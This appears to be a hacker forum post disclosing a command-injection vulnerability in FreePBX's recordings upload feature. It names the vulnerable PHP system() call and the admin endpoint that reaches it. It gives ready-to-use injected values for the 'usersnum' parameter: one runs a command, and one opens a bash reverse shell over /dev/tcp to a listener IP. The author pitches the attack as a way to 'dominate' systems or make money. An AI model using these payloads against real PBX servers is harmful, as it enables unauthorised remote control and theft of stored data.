And again , while the distro is widely user , Schmoozecom staff not giving it enough attention ,
all they provided for the distro is adding the schmoozecom fancy logo and "Developed by schmoozecom" Teraraa :/
What ever,
Freepbx suffer from another command execution vuln , not so critical but perhaps many people gonna be interested abt it
as it can be used to dump plaintext data from the PBX Box ;)

Actually as you can see there are many exploitable lines there , but here am interested about this line
system("chmod g+rw ".$destfilename);
if you traced the function flow you will notice that 'destfilename' get part of his value from the parameter $_REQUEST['usersnum']
the function is called via
Target/admin/config.php?type=setup&display=recordings
before uploading open firebug
search for usersnum
edit value to
fa;id>faris;fax
or , for backconnetion use
fa;bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.56.1%2f1337%200%3E%261;faris
and you are ready to dominate , or even make some $$ if you r interested ;)
Have a good day